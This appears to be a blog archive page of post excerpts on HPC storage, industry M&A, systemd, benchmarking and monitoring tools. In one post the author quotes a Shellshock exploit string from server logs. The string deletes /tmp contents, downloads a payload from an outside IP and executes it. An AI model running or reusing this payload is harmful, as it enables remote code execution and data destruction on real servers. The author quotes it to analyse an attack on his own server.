Day job PR: JRTI and Scalable Informatics Form Strategic Partnership
Will be up on the day job site tomorrow. We are very excited by these developments, and look forward to a productive relationship
JRTI and Scalable Informatics Form Strategic Partnership to Provide High Performance Storage and CPU & GPU Clusters to Organizations Seeking Exceptional Results Richmond, Virginia (January 18, 2011)-James River Technical, Inc (JRTI), specialists in accelerated and HPC solutions for the higher education, research, government, and commercial market segments, has entered into a reseller agreement with Scalable Informatics (Scalable) to provide Storage and HPC solutions throughout North America.
Posts
What is going on with SGI?
We are hearing about SGI wins on HPCwire and other venues. These should be good, and reflected in the stock price.
[ ](http://ichart.finance.yahoo.com/z?s=SGIC&t=2y&q=l&l=on&z=l&p=s&a=v&p=s)
But they aren’t. SGI’s market cap is 90.6M as of this morning, with 1500+ employees. Trailing 12 month revenue is 415M. They have 85M of debt. About 33.2M in cash. Something has got to give here. As they stopped making their own stuff, COGS increased, as their suppliers made more margin off completed product.
Posts
Tilera
Over at Accelerated Times, an article was posted about Tilera. Now I haven’t heard much about Tilera, other than pre-releases. [update: look at the comment here] The author focuses on several important aspects: the business model, the money raise, and whether they are where they say they are.
What strikes me is that if they raised a B-round, this usually … usually happens post initial revenue, when you start to see interest and traction.
Posts
Guide to getting OFED 1.2 to build on OpenSuSE
Grab the tarball from the open fabrics alliance (or from here)
Grab the build_new.sh from here and place it in the OFED-1.2 directory. As root on your machine:

    mv /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h.original
    ln -s /usr/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h

Then run the build_new.sh. Voila. Works. Binary RPMs are here.
Posts
HPC in the critical path
Is high performance computing a critical path technology? Is it a technology that you cannot do without? This is a question some potential partners were discussing this evening. Very interesting question. If HPC is not critical, then demand for it should be quite moderate. If it is not critical, then the market would have basically replacement level growth rates. If end users did not see a value in HPC, they wouldn’t use it, as their time would be spent elsewhere.
Posts
Amusing
The IBM folks have turned the Blue Gene into what they claim is the world’s fastest blast engine. Interesting read. They use our A. thaliana data in the Bioinformatics Benchmark System v3 (BBS) to perform their measurement, as well as data from Aaron Darling for mpiBLAST. Our data had been in a mislabeled file for years, and I never took the time to rename the S. lycopersicum for the original Arabidopsis.
Category: health
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Three years
It’s been 3 years to the day since I wrote this. As we’ve been doing before this happened, and after this happened, we are going to a TSO concert on the anniversary of the surgery. It’s an affirmation of sorts. I can tell you that 3 years in, it has changed me in some fairly profound ways … I no longer take some things for granted. I try to spend more time with the family, do more things with them.
Posts
Definition of vacation
… appears to be normal working hours from a location that is not your office, home … I am supposed to be on vacation. A short one, as there are simply far too many things on my plate (notice my recent posting frequency?). Instead, I am trying to solve problems for customers, sign NDAs, handle support calls. What was the purpose of vacation or holiday again? I keep forgetting.
Posts
When you cross the rubicon
… from hobby and sport, to something more. I’ve traveled 1k miles for karate tournaments (to participate). I have not, as of yet, crossed an international border for one. That changes tomorrow. I went through a promotion test last week with an injured intercostal muscle. This caused all sorts of joy … no really … and had me think that I had a serious kidney stone flare up. The pain was in the same region, and toradol helped, which drew me to a rapid, and incorrect conclusion as to the pain.
Category: isp
Posts
Comcast finally fixed their latency issue
This has been a point of contention for us for years. Our office has multiple network attachments, and Comcast is one of them. This is the main office, not the home office. Latency on the link, as measured by DNS pings, has always been fairly high, in the 2-3ms region, as compared to our other connection (using a different provider and a different technology), which has been consistently 0.5ms for the last 2 years.
Posts
Comcast disabled port 25 mail on our business account
We have a business account at home. I work enough from home that I can easily justify it. Fixed IP, and I run services, mostly to back up my office services. One of those services is SMTP. I’ve been running an SMTP server, complete with antispam/antivirus/… for years. Handles backup for some domains, but is also primary for this site. This is allowable on business accounts. Or it was allowable. 3 days ago, they seem to have turned that off.
Category: m-and-a
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Engenio).
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
M&A: Vertical integration plays
Two items of note here. First, Cavium acquires qlogic. This is interesting at some levels, as qlogic has been a long time player in storage (and networking). There are many qlogic FC switches out there, as well as some older Infiniband gear (pre-Intel sale). Cavium is more of a processor shop, having built a number of interesting SoC and general purpose CPUs. I am not sure the combo is going to be a serious contender to Intel or others in the data center space, but I think they will be working on carving out a specific niche.
Posts
VC landscape changing: Intel Capital on the market
Saw this in a post on VentureBeat. Intel Capital has been an important player in the space for a while. What happens next to them is worth paying attention to. They’ve been in the thick of many interesting companies, though usually outside of Intel’s core foci. Somewhat beyond the normal corporate strategic VC roles. This could change a number of things for startups … new and existing. VCs have been sitting on the sidelines, or being less active over the recent past, and this is likely not to help the situation.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
M&A: Huge ... WD acquires SanDisk
This is huge. Now Seagate has a relationship with Micron, Toshiba has its own disks and shares a fab with SanDisk (though I think with this acquisition, that will rapidly change). Ok … so the HD vendors are busy snapping up the Flash makers. Is Micron next? Rumors of something have been swirling for a while. Note also, SanDisk has their InfiniFlash unit. WD simply did not have storage appliances. This gets them into that space, and directly competing with the likes of all the smaller startup all flash array (AFA) vendors.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliott Management (e.g. they wanted more return on their investment). As part of increasing the return and value returned to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
possible M&A: Dell and EMC?
Story is here. Not sure this is a great tie up … EMC has lots of things Dell doesn’t need (and vice versa). Possibly parts of EMC (secession from the federation?) with Dell. I can’t imagine VMware wanting to tie up with one vendor. Nor Pivotal, etc. This said, Cisco pulled out of the venture with EMC to pursue its own directions, competitive with elements. But then they bought and subsequently closed Whiptail.
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
M&A fallout: Cisco may have ditched Invicta after buying Whiptail
Article is here, take it as a rumor until we hear from them. My comments: First, M&A is hard. You need a good fit product wise (little overlap and great complementary functions/capabilities), and the culture/people fit matters. Second, sales teams need to be on-board selling complete solutions involving the acquired tech. Sometimes this doesn’t happen, for any number of reasons, some fixable, some not. Third, Cisco is out of the storage game if this is true.
Posts
M&A or more correctly, acqui-hire: Cray bags much of Terascala
Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales, and put their code on their partners’ hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation … unless their boxes were entirely undifferentiated, in which case it would reduce their overall costs to avoid selling undifferentiated hardware.
Posts
Potential M&A: Micron being pursued
I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential, that is)? Well, there are 4 basic Flash fabs out there these days.
Posts
M&A [RUMOR]: Cisco grabs Nutanix
[update] TL;DR this appears to be rumor/speculation. One would think that such an acquisition would be prominent on Nutanix’s web site. It’s April Fools, in May. /sigh
Huge in the hyperconverged space (which, not so curiously, is where the day job is), and it’s setting up the battle lines between the major software/hardware players. Cisco was already the number 5 hardware vendor, and was bragging about “beating the white boxes”. The last may be more wishful thinking than reality.
Category: metadata
About
About
My name is Joe. I used to run a small revenue-backed high performance storage, cluster, and accelerated computing company named Scalable Informatics. We did all sorts of neat things like build really fast clusters, very fast and reliable storage systems, acceleration systems and software, tune code, parallelize applications, but you can follow the link if you would like more info. This blog isn’t about the company. I do what I can to maintain a positive outlook and a sense of humor.
Category: monitoring
Posts
Excellent article on mistakes made for infrastructure ... cloud jail is about right
Article is here at First Round Capital. This goes to a point I’ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don’t work. We’ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.). Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really … really grok what is going on.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. It replaces 20-ish year old init style processing with a more legitimate control plane, using a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
You can't win
Like that old joke about the patient going to the Doctor for a pain …
Imagine if you will, a patient who, after being told what is wrong, and why it hurts, and what to do about it, continues to do it. And is more intensive about doing it. And then complains when it hurts. This is a rough metaphor for some recent support experiences. We do our best to convince them not to do the things that cause them pain, as in this case, they are self-inflicted.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have a booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
InfluxDB cli ready for people to play with
The code is on github. Installation should be simple:

    sudo make INSTALLPATH=/path/where/you/want/it

It will install any needed Perl modules for you. I’ve reduced the dependency set to LWP::UserAgent, Getopt::Lucid, JSON::PP, and some text processing. As much as I like Mojolicious, the UserAgent was 1/10th the speed of LWP for the same work. Once it is done, point it over to an InfluxDB database instance:
landman@metal:~/work/development/influxdbcli$ ./influxdb-cli.pl --user scalable --pass XXXXXXX --host 192.
Category: network
Posts
Has Alibaba been compromised?
I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba. This doesn’t mean anything in and of itself, until we look at the payload.
    ()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22

This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that … I’ll wait.
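The payload is percent-encoded, so it is easier to read once decoded. Here is a small sketch using Python’s standard `urllib.parse.unquote` on just the leading fragment of the logged string. Nothing is executed, and the prefix check is my own illustration, not part of the original log analysis.

```python
from urllib.parse import unquote

# Leading fragment of the request string from the log above (truncated on purpose).
encoded = "()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*"

# Percent-decoding only; the result is printed, never run.
decoded = unquote(encoded)
print(decoded)

# A function-definition prefix like this is consistent with the 2014 bash
# environment-variable bug (commonly called Shellshock).
has_function_prefix = decoded.startswith("() { :; };")
print(has_function_prefix)
```

Decoded, the opening of the string reads as an empty bash function definition followed by a command, which is the pattern that bug relied upon.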
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
    nc -k -l a.b.c.d 10000

Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. It’s way too freaking simple.
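Why one missing newline matters: a line-oriented receiver only treats a record as complete once the terminator arrives. The sketch below shows that with a local socket pair. The record format and both helper names are made up for illustration, and this is not the code from the monitoring tool itself.

```python
import socket

def frame(record: str) -> bytes:
    """Terminate a record with exactly one newline (hypothetical helper)."""
    return (record.rstrip("\n") + "\n").encode("ascii")

def complete_lines(buffer: bytes) -> list:
    """Return only the newline-terminated records in buffer, as a line-oriented reader would."""
    *done, _partial = buffer.split(b"\n")
    return [line.decode("ascii") for line in done]

sender, receiver = socket.socketpair()
record = "host.load 0.42 1400000000"   # made-up metric line

# The bug: the bytes arrive, but no record is ever considered complete.
sender.sendall(record.encode("ascii"))
unterminated = complete_lines(receiver.recv(4096))

# The fix: the same record with its terminator.
sender.sendall(frame(record))
terminated = complete_lines(receiver.recv(4096))

sender.close()
receiver.close()

print(unterminated)
print(terminated)
```

An nc listener like the one above makes this visible because it shows the raw bytes, terminator or not.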
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
Comcast disabled port 25 mail on our business account
We have a business account at home. I work enough from home that I can easily justify it. Fixed IP, and I run services, mostly to back up my office services. One of those services is SMTP. I’ve been running an SMTP server, complete with antispam/antivirus/… for years. Handles backup for some domains, but is also primary for this site. This is allowable on business accounts. Or it was allowable. 3 days ago, they seem to have turned that off.
Category: performance
Posts
Put my Riemann Zeta Function sum reduction code on github
Repo is here: https://github.com/joelandman/rzf. There’s a lightning talk to go along with it, and I’ll make sure I can get it together for this as well.
Posts
Aria2c for the win!
I’ve not heard of aria2c before today. Sort of a super wget as far as I could tell. Does parallel transfers to reduce data motion time, if possible. So I pulled it down, built it. I have some large data sets to move. And a nice storage area for them. Ok. Fire it up to pull down a 2GB file. Much faster than wget on the same system over the same network.
Posts
Working on benchmarking ML frameworks
Nice machine we have here …
    root@hermes:/data/tests# lspci | egrep -i '(AMD|NVidia)' | grep VGA
    3b:00.0 VGA compatible controller: <a href="http://www.pny.com/nvidia-quadro-gp100">NVIDIA Corporation GP100GL</a> (rev a1)
    88:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] <a href="http://www.tomshardware.com/reviews/amd-radeon-vega-frontier-edition-16gb,5128.html">Vega 10 XTX</a> [Radeon Vega Frontier Edition]

I want to see how tensorflow and many others run on each of the cards. The processor is no slouch either:
root@hermes:/data/tests# lscpu | grep "Model name" Model name: Intel(R) Xeon(R) Gold 6134 CPU @ 3.
Posts
Finally got to use MCE::* in a project
There is a set of modules in the Perl universe that I’ve been looking for an excuse to use for a while. They are the MCE set of modules, which purportedly enable easy concurrency and parallelism, exploiting many core CPUs, and a number of techniques. Sure enough, I had a task to handle recently that required this. I looked at many alternatives, and played with a few, including Parallel::Queue. I thought of writing my own with IPC::Run as I was already using it in the project, but I didn’t want to lose focus on the mission, and re-invent a wheel that already existed elsewhere.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency
* 45GBps read bandwidth
* 15GBps write bandwidth
* 7 million IOPS

But then … a fibre connection.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
How’s this for a nice deskside system ... one of our Cadence boxen
For a partner. They made a request for something we’ve not built in a while … it had been end of lifed. One of our old Pegasus units. A portable deskside supercomputer. In this case, a deskside franken-computer … built out of the spare parts from other units in our lab. It started out as a 24 core monster, but we had a power supply burn out, and take the motherboard with it.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. It’s not quite an exact description; have a look at Kx’s website for a more accurate one.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
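For a sense of scale, the 10GB/s figure can be compared against the nominal ceiling of a 100Gb link. This is a back-of-the-envelope sketch that ignores protocol and encoding overhead (an assumption), so the real ceiling is somewhat lower than what it prints.

```python
LINK_GBIT_S = 100.0     # nominal link speed from the post
OBSERVED_GB_S = 10.0    # write (and read) bandwidth from the post

def line_rate_gb_s(gbit_s: float) -> float:
    """Convert a nominal link speed in Gbit/s to GB/s, ignoring overhead (assumption)."""
    return gbit_s / 8.0

ceiling_gb_s = line_rate_gb_s(LINK_GBIT_S)
utilization = OBSERVED_GB_S / ceiling_gb_s

print(f"nominal ceiling: {ceiling_gb_s} GB/s")
print(f"utilization: {utilization:.0%}")
```

So a single 2U box is filling most of the pipe, through a file system, with default tuning.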
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
    ----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system--
    usr sys idl wai hiq siq| read  writ| recv  send|  in   out | int   csw
      0   1  95   5   0   0| 513M    0 | 480B    0 |   0     0 |  10k   20k
      4   2  94   0   0   0|   0     0 | 480B    0 |   0     0 |5238   721
      0   2  98   0   0   0|   0     0 | 480B    0 |   0     0 |4913   352
      0   2  98   0   0   0|   0     0 | 570B   90B|   0     0 |4966   613
      0   2  98   0   0   0|   0     0 | 480B    0 |   0     0 |4912   413
      0   2  98   0   0   0|   0     0 | 584B   92B|   0     0 |4965   334
      0   2  98   0   0   0|   0     0 | 480B    0 |   0     0 |4914   306
      0   2  98   0   0   0|   0     0 | 636B  147B|   0     0 |4969   483
      0   2  98   0   0   0|   0     0 | 570B    0 |   0     0 |4915   377
      8   8  50  32   0   2|7520k 8382M| 578B    0 |   0     0 |  76k  215k
      9   7  30  52   0   3|8332k   12G| 960B  132B|   0     0 | 109k  279k
     10   5  29  53   0   2|4136k   12G| 240B    0 |   0     0 | 109k  277k
     12   6  29  51   0   2|4208k   12G| 240B    0 |   0     0 | 108k  280k
     11   6  31  50   0   2|2244k   12G| 330B   90B|   0     0 | 109k  281k
     11   6  30  50   0   3|2272k   13G| 240B    0 |   0     0 | 110k  281k

Writes around 12.
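Taking the steady-state `writ` column from the dstat output above, the aggregate can be split across the 60 drives to see what each one is being asked to do. A rough sketch only: reading dstat’s `G` as GiB and spreading the load evenly across drives are both assumptions.

```python
# Numbers read off the post and the dstat output; unit interpretation is an assumption.
DRIVES = 60                  # "all 60 drives" from the post
AGGREGATE_WRITE_GIB_S = 12   # steady-state "writ" column, assuming G means GiB
CHUNK_KIB = 128              # "128k chunks" from the post

# Even split across drives (assumption: no drive is faster or slower than the rest).
per_drive_mib_s = AGGREGATE_WRITE_GIB_S * 1024 / DRIVES

# How many 128 KiB writes per second that implies for each drive.
per_drive_chunks_s = per_drive_mib_s * 1024 / CHUNK_KIB

print(f"per drive: {per_drive_mib_s:.1f} MiB/s")
print(f"per drive: {per_drive_chunks_s:.0f} chunks/s at {CHUNK_KIB} KiB")
```

For a burn-in test that is the useful number: a drive that falls well short of its share is a candidate for a closer look.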
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many things I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
* Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture
* Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances
* Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance
* Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance
* Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
sios-metrics core rewritten
This was a long time coming. Something I needed to do, in order to build a far better code capable of using less network, less CPU power, and providing a better overall system. In short, I ripped out the graphite bits and wrote a native interface to InfluxDB. This interface will also be adapted to kdb+ (32 bit edition), and graphite as time allows. In the process, I cleaned up a tremendous amount of code.
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have a booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in as minimal a footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, or integrate them into a larger FastPath Unison system. We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Parallel building debian kernels ... and why its not working ... and how to make it work
So we build our own kernels. No great surprise, as we put our own patches in, our own drivers, etc. We have a nice build environment for RPMs and .debs. It works, quite well. Same source, same patches, same make file driving everything. We get shiny new and happy kernels out the back end, ready for regression/performance/stability testing. Works really well. But … but … parallel builds (e.g. leveraging more than 1 CPU) work only for the RPM builds.
Posts
Inventory reduction @scalableinfo
It’s that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
* 16-24 processor cores
* 128 GB RAM
* 48x {2,3,4} TB top mount drives
* 4x rear mount SSDs (OS/metadata cache)
* Scalable OS (Debian Wheezy based Linux OS)
* 3 year warranty
As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to systemd. As have a number of others. Including, surprisingly, Debian. For those who don’t know what this is, think of it this way.
Posts
